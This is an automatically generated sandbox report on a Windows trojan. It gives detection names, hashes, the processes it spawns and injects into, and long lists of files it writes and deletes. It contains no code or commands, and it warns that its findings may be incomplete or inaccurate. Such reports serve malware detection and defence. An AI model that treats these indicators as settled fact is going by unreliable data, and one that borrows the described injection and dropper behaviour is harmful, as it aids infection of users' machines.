Trojan.Win32.Kovter.jqd (Kaspersky), Trojan.GenericKD.3142479 (AdAware), Trojan.Win32.Alureon.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: bfa0be4038c3d1ebbe7557be0cfac78c
SHA1: c6285115f1a9abac1727a4f55feae077920fb896
SHA256: c3330f66a33be8334221b6f4b8493609651a234786bdd8db9c8aa16ff971f2d1
SSDeep: 196608:X N2iXiJwxvBPyqTpMT4kgSL5e7UnowYP/j72cE1ZBn1bsalhJmnlG05oR:XzH61Bg4kt5e4nrYTSjBVsaHJmlG05oR
Size: 9304658 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-02-24 21:20:04
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
csc.exe:1992
csc.exe:888
csc.exe:444
csc.exe:1532
csc.exe:544
csc.exe:2008
csc.exe:332
csc.exe:1752
csc.exe:1512
07-04-2016_hwopt_3.0.10-1.tmp:432
MSIF2.tmp:3740
netsh.exe:652
netsh.exe:2084
InstallUtil.exe:1744
InstallUtil.exe:2024
clicker.exe:2312
clicker.exe:2452
sc.exe:716
sc.exe:588
sc.exe:2000
sc.exe:456
sc.exe:504
sc.exe:1752
WindowsXP-KB968930-x86-ENG.exe:3496
master.exe:1488
mscorsvw.exe:4020
mscorsvw.exe:3616
mscorsvw.exe:2948
mscorsvw.exe:3756
mscorsvw.exe:2196
mscorsvw.exe:3536
mscorsvw.exe:3676
mscorsvw.exe:3044
mscorsvw.exe:2544
mscorsvw.exe:2564
mscorsvw.exe:1856
mscorsvw.exe:3180
mscorsvw.exe:2660
mscorsvw.exe:2508
mscorsvw.exe:2680
mscorsvw.exe:2872
mscorsvw.exe:3832
mscorsvw.exe:3872
mscorsvw.exe:304
mscorsvw.exe:224
mscorsvw.exe:1556
mscorsvw.exe:2536
mscorsvw.exe:2000
mscorsvw.exe:2412
mscorsvw.exe:2064
wsmanhttpconfig.exe:2848
wsmanhttpconfig.exe:2452
MsiExec.exe:3168
MsiExec.exe:2812
%original file name%.exe:1328
update.exe:3572
PSCustomSetupUtil.exe:2428
PSCustomSetupUtil.exe:3452
PSCustomSetupUtil.exe:3416
PSCustomSetupUtil.exe:2800
PSCustomSetupUtil.exe:3068
PSCustomSetupUtil.exe:3232
PSCustomSetupUtil.exe:2300
PSCustomSetupUtil.exe:2484
PSCustomSetupUtil.exe:2548
PSCustomSetupUtil.exe:3344
PSCustomSetupUtil.exe:2388
PSCustomSetupUtil.exe:2288
PSCustomSetupUtil.exe:3664
PSCustomSetupUtil.exe:2600
PSCustomSetupUtil.exe:2876
PSCustomSetupUtil.exe:3884
PSCustomSetupUtil.exe:2284
PSCustomSetupUtil.exe:3932
PSCustomSetupUtil.exe:2976
PSCustomSetupUtil.exe:3704
PSCustomSetupUtil.exe:3544
PSCustomSetupUtil.exe:3140
PSCustomSetupUtil.exe:3784
PSCustomSetupUtil.exe:3224
PSCustomSetupUtil.exe:3984
PSCustomSetupUtil.exe:3848
regsvr32.exe:3056
regsvr32.exe:2644
summit_sharma.exe:2672
07-04-2016_hwopt_3.0.10-1.exe:1632
XBLive.exe:3008
InstallationStatsUploder_12052016001648.exe:2044
InstallationStatsUploder_12052016001648.exe:1488
InstallationStatsUploder_12052016001648.exe:580
InstallationStatsUploder_12052016001648.exe:1636
InstallationStatsUploder_12052016001648.exe:1860
InstallationStatsUploder_12052016001648.exe:1612
InstallationStatsUploder_12052016001648.exe:640
InstallationStatsUploder_12052016001648.exe:1848
InstallationStatsUploder_12052016001648.exe:508
InstallationStatsUploder_12052016001648.exe:1292
InstallationStatsUploder_12052016001648.exe:1400
EditBinx86.exe:960
EditBinx86.exe:2012
mofcomp.exe:2684
ngen.exe:332
ngen.exe:276
ngen.exe:2092
ngen.exe:3300
ngen.exe:2136
ngen.exe:3212
ngen.exe:2056
ngen.exe:3340
ngen.exe:2248
ngen.exe:3160
ngen.exe:2112
ngen.exe:2240
ngen.exe:3232
ngen.exe:444
ngen.exe:1496
ngen.exe:2188
ngen.exe:2212
ngen.exe:2276
ngen.exe:780
ngen.exe:3224
ngen.exe:2024
ngen.exe:2160
ngen.exe:2148
runonce.exe:3520
cvtres.exe:308
cvtres.exe:1968
cvtres.exe:1556
cvtres.exe:952
cvtres.exe:1064
cvtres.exe:340
cvtres.exe:164
cvtres.exe:504
cvtres.exe:364
Osman_Navigation.exe:4072
PSSetupNativeUtils.exe:968
fileman.exe:1636
mastermind.exe:3740
grpconv.exe:3484
The Trojan injects its code into the following process(es):
hwopt12052016001648_updater_service.exe:380
regsvr32.exe:2700
regsvr32.exe:2952
hwopt12052016001648.exe:912
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process csc.exe:1992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCF.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.out (396 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCF.tmp (0 bytes)
The process csc.exe:888 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCB.tmp (664 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCB.tmp (0 bytes)
The process csc.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC7.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.out (396 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES8.tmp (0 bytes)
The process csc.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCD.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.out (396 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCD.tmp (0 bytes)
The process csc.exe:544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC5.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.dll (4150 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES6.tmp (0 bytes)
The process csc.exe:2008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC11.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.dll (4150 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES12.tmp (0 bytes)
The process csc.exe:332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\4p64sgqi.dll (4150 bytes)
%WinDir%\Temp\4p64sgqi.out (396 bytes)
%WinDir%\Temp\CSC13.tmp (664 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\CSC13.tmp (0 bytes)
%WinDir%\Temp\RES14.tmp (0 bytes)
The process csc.exe:1752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC3.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.dll (4150 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC3.tmp (0 bytes)
The process csc.exe:1512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC9.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.out (396 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RESA.tmp (0 bytes)
The process 07-04-2016_hwopt_3.0.10-1.tmp:432 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\EditBinx86.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\x86_WinDivert.zip (9 bytes)
%WinDir%\hwopt_12052016001648\unins000.dat (9300 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-SG5DG.tmp (5873 bytes)
%WinDir%\hwopt_12052016001648\Utils.dll (57 bytes)
%WinDir%\hwopt_12052016001648\is-JSA3M.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-39PQT.tmp (28 bytes)
%WinDir%\hwopt_12052016001648\is-3HV2J.tmp (28 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-11RFO.tmp (601 bytes)
%WinDir%\hwopt_12052016001648\addon\is-RR6J5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-QADEL.tmp (9 bytes)
%WinDir%\hwopt_12052016001648\is-NGNQK.tmp (6841 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-KE3G3.tmp (5441 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-0GUHR.tmp (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\_isetup\_shfoldr.dll (23 bytes)
%WinDir%\hwopt_12052016001648\is-KKUTO.tmp (3361 bytes)
%WinDir%\hwopt_12052016001648\addon\is-H19H5.tmp (18 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-4A1SP.tmp (14 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-TJDF4.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp (4 bytes)
%WinDir%\hwopt_12052016001648\addon\is-TRQBO.tmp (12287 bytes)
%WinDir%\hwopt_12052016001648\addon\is-1J7I3.tmp (1 bytes)
%WinDir%\hwopt_12052016001648\is-7B37I.tmp (20 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-J0U8C.tmp (601 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-22OLL.tmp (2105 bytes)
%WinDir%\hwopt_12052016001648\is-480KO.tmp (31 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-37BTT.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\addon\is-3PU0B.tmp (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\fileman.exe (673 bytes)
%WinDir%\hwopt_12052016001648\addon\is-NUNLD.tmp (985 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-VTGNO.tmp (601 bytes)
%WinDir%\hwopt_12052016001648\is-1JNQO.tmp (25361 bytes)
%WinDir%\hwopt_12052016001648\addon\is-B1DBC.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\addon\is-SVUH5.tmp (424 bytes)
%WinDir%\hwopt_12052016001648\addon\is-FLV5J.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\Utilsx86.dll (57 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-FCRIP.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-LKUF0.tmp (57 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-SI3J3.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-PL8C4.tmp (1281 bytes)
%WinDir%\hwopt_12052016001648\addon\is-4S0ED.tmp (31 bytes)
%WinDir%\hwopt_12052016001648\addon\is-DNIFE.tmp (6841 bytes)
%WinDir%\hwopt_12052016001648\addon\is-HP0LE.tmp (1 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-LS6F4.tmp (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-ADFMM.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\is-V18V5.tmp (16 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-5O5GC.tmp (1281 bytes)
%WinDir%\hwopt_12052016001648\is-LDP3M.tmp (2321 bytes)
%WinDir%\hwopt_12052016001648\is-2JF6C.tmp (16 bytes)
%WinDir%\hwopt_12052016001648\addon\is-H96Q4.tmp (7345 bytes)
%WinDir%\hwopt_12052016001648\WinDivert.dll (18 bytes)
%WinDir%\hwopt_12052016001648\addon\is-T8IBT.tmp (7971 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\EditBinx86.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\WinDivert.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\fileman.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\x86_WinDivert.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\Utilsx86.dll (0 bytes)
The process InstallUtil.exe:1744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\hwopt_12052016001648\hwopt12052016001648.InstallLog (732 bytes)
%System%\config\SYSTEM.LOG (4777 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648.InstallState (196 bytes)
%System%\config\system (1723 bytes)
C:\$Directory (288 bytes)
%WinDir%\hwopt_12052016001648\InstallUtil.InstallLog (672 bytes)
The process InstallUtil.exe:2024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\config\system (2397 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648_updater_service.InstallState (196 bytes)
%System%\config (288 bytes)
%System%\config\SYSTEM.LOG (4793 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648_updater_service.InstallLog (876 bytes)
%WinDir%\hwopt_12052016001648\InstallUtil.InstallLog (1311 bytes)
The process clicker.exe:2312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\b_dk.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw16.tmp (7405 bytes)
%Documents and Settings%\%current user%\Application Data\chapter.gif (7192 bytes)
%Documents and Settings%\%current user%\Application Data\1.png (234 bytes)
%Documents and Settings%\%current user%\Application Data\28.svg (1 bytes)
%Documents and Settings%\%current user%\Application Data\TerraceSawwortSouthernwood (2 bytes)
%Documents and Settings%\%current user%\Application Data\septillions.dll (6 bytes)
%Documents and Settings%\%current user%\Application Data\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\make.graphic.viewport.xml (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw15.tmp (0 bytes)
The process WindowsXP-KB968930-x86-ENG.exe:3496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\f1fab1e3e4f7fec893e8\update\update.exe (10748 bytes)
C:\f1fab1e3e4f7fec893e8\about_language_keywords.help.txt (11 bytes)
C:\f1fab1e3e4f7fec893e8\update (4 bytes)
C:\f1fab1e3e4f7fec893e8\about_if.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\windowsremotemanagement.adm (574 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.dll (14450 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\f1fab1e3e4f7fec893e8\about_modules.help.txt (13 bytes)
C:\f1fab1e3e4f7fec893e8\update\updspapi.dll (5940 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.cmd (35 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.dll-help.xml (16567 bytes)
C:\f1fab1e3e4f7fec893e8\about_scripts.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_wildcards.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\f1fab1e3e4f7fec893e8\about_aliases.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_type_operators.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\registry.format.ps1xml (20 bytes)
C:\f1fab1e3e4f7fec893e8\about_try_catch_finally.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\wsmauto.mof (4 bytes)
C:\f1fab1e3e4f7fec893e8\about_regular_expressions.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_methods.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.ini (1956 bytes)
C:\f1fab1e3e4f7fec893e8\types.ps1xml (2510 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.resources.dll (9 bytes)
C:\f1fab1e3e4f7fec893e8\wtrinstaller.ico (4803 bytes)
C:\f1fab1e3e4f7fec893e8\wsmprovhost.exe (657 bytes)
C:\f1fab1e3e4f7fec893e8\about_while.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_parsing.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\wsman.format.ps1xml (837 bytes)
C:\f1fab1e3e4f7fec893e8\dotnettypes.format.ps1xml (266 bytes)
C:\f1fab1e3e4f7fec893e8\about_trap.help.txt (10 bytes)
C:\$Directory (800 bytes)
C:\f1fab1e3e4f7fec893e8\about_bits_cmdlets.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\spuninst.exe (3787 bytes)
C:\f1fab1e3e4f7fec893e8\about_script_internationalization.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.resources.dll (3153 bytes)
C:\f1fab1e3e4f7fec893e8\powershell_ise.exe (2526 bytes)
C:\f1fab1e3e4f7fec893e8\pssetupnativeutils.exe (9 bytes)
C:\f1fab1e3e4f7fec893e8\wsmauto.dll (1842 bytes)
C:\f1fab1e3e4f7fec893e8\powershellcore.format.ps1xml (1492 bytes)
C:\f1fab1e3e4f7fec893e8\pspluginwkr.dll (1756 bytes)
C:\f1fab1e3e4f7fec893e8\powershelltrace.format.ps1xml (344 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\f1fab1e3e4f7fec893e8\about_do.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_variables.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.inf (2457 bytes)
C:\f1fab1e3e4f7fec893e8\about_path_syntax.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\winrmprov.mof (789 bytes)
C:\f1fab1e3e4f7fec893e8\about_operators.help.txt (770 bytes)
C:\f1fab1e3e4f7fec893e8\about_reserved_words.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\about_parameters.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\windowsremoteshell.adm (12 bytes)
C:\f1fab1e3e4f7fec893e8\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\f1fab1e3e4f7fec893e8\about_types.ps1xml.help.txt (481 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssession_details.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\about_ref.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\default.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.runtime.dll (33 bytes)
C:\f1fab1e3e4f7fec893e8\about_transactions.help.txt (1011 bytes)
C:\f1fab1e3e4f7fec893e8\about_comment_based_help.help.txt (595 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssnapins.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_core_commands.help.txt (221 bytes)
C:\f1fab1e3e4f7fec893e8\eventforwarding.adm (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_format.ps1xml.help.txt (17 bytes)
C:\f1fab1e3e4f7fec893e8\about_hash_tables.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshplugin.dll (802 bytes)
C:\f1fab1e3e4f7fec893e8\about_eventlogs.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\certificate.format.ps1xml (155 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\f1fab1e3e4f7fec893e8\about_ws-management_cmdlets.help.txt (405 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\f1fab1e3e4f7fec893e8\importallmodules.psd1 (438 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshsip.dll (24 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_troubleshooting.help.txt (146 bytes)
C:\f1fab1e3e4f7fec893e8\wsmwmipl.dll (2816 bytes)
C:\f1fab1e3e4f7fec893e8\about_requires.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_command_syntax.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_faq.help.txt (775 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.dll (3386 bytes)
C:\f1fab1e3e4f7fec893e8\about_wmi_cmdlets.help.txt (8 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced_methods.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\getevent.types.ps1xml (15 bytes)
C:\f1fab1e3e4f7fec893e8\about_split.help.txt (10 bytes)
C:\f1fab1e3e4f7fec893e8\wsmsvc.dll (15909 bytes)
C:\f1fab1e3e4f7fec893e8\profile.ps1 (772 bytes)
C:\f1fab1e3e4f7fec893e8\about_locations.help.txt (794 bytes)
C:\f1fab1e3e4f7fec893e8\about_pipelines.help.txt (411 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshmsg.dll (4 bytes)
C:\f1fab1e3e4f7fec893e8\winrsmgr.dll (2 bytes)
C:\f1fab1e3e4f7fec893e8\update\spcustom.dll (23 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced_parameters.help.txt (962 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\wsmpty.xsl (1 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.ver (14 bytes)
C:\f1fab1e3e4f7fec893e8\about_properties.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\about_break.help.txt (792 bytes)
C:\f1fab1e3e4f7fec893e8\about_quoting_rules.help.txt (659 bytes)
C:\f1fab1e3e4f7fec893e8\spupdsvc.exe (287 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\wsmtxt.xsl (2 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\f1fab1e3e4f7fec893e8\about_redirection.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\winrs.exe (1154 bytes)
C:\f1fab1e3e4f7fec893e8\help.format.ps1xml (3947 bytes)
C:\f1fab1e3e4f7fec893e8\wsmres.dll (6164 bytes)
C:\f1fab1e3e4f7fec893e8\winrssrv.dll (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_continue.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll (5010 bytes)
C:\f1fab1e3e4f7fec893e8\about_return.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\about_objects.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_environment_variables.help.txt (417 bytes)
C:\f1fab1e3e4f7fec893e8\update\kb968930xp.cat (512 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_jobs.help.txt (13 bytes)
C:\f1fab1e3e4f7fec893e8\bitstransfer.psd1 (950 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_requirements.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_output.help.txt (887 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\about_script_blocks.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\about_profiles.help.txt (457 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.resources.dll (13 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.dll (3118 bytes)
C:\f1fab1e3e4f7fec893e8\winrscmd.dll (2907 bytes)
C:\f1fab1e3e4f7fec893e8\about_arrays.help.txt (8 bytes)
C:\f1fab1e3e4f7fec893e8\about_signing.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_automatic_variables.help.txt (14 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.dll (38414 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\f1fab1e3e4f7fec893e8\spmsg.dll (495 bytes)
C:\f1fab1e3e4f7fec893e8\about_windows_powershell_ise.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_data_sections.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_providers.help.txt (59 bytes)
C:\f1fab1e3e4f7fec893e8\powershell_ise.resources.dll (4 bytes)
C:\f1fab1e3e4f7fec893e8\about_debuggers.help.txt (21 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.resources.dll (562 bytes)
C:\f1fab1e3e4f7fec893e8\pscustomsetuputil.exe (316 bytes)
C:\f1fab1e3e4f7fec893e8\winrmprov.dll (591 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\f1fab1e3e4f7fec893e8\diagnostics.format.ps1xml (590 bytes)
C:\f1fab1e3e4f7fec893e8\about_logical_operators.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_line_editing.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\about_command_precedence.help.txt (8 bytes)
C:\f1fab1e3e4f7fec893e8\filesystem.format.ps1xml (133 bytes)
C:\f1fab1e3e4f7fec893e8\powershell.exe.mui (10 bytes)
C:\f1fab1e3e4f7fec893e8\about_session_configurations.help.txt (276 bytes)
C:\f1fab1e3e4f7fec893e8\about_prompts.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.dll (1145 bytes)
C:\f1fab1e3e4f7fec893e8\about_assignment_operators.help.txt (379 bytes)
C:\f1fab1e3e4f7fec893e8\$shtdwn$.req (788 bytes)
C:\f1fab1e3e4f7fec893e8\bitstransfer.format.ps1xml (16 bytes)
C:\f1fab1e3e4f7fec893e8\windowspowershellhelp.chm (26041 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\f1fab1e3e4f7fec893e8\about_execution_policies.help.txt (13 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\f1fab1e3e4f7fec893e8\about_switch.help.txt (489 bytes)
C:\f1fab1e3e4f7fec893e8\about_throw.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_join.help.txt (2 bytes)
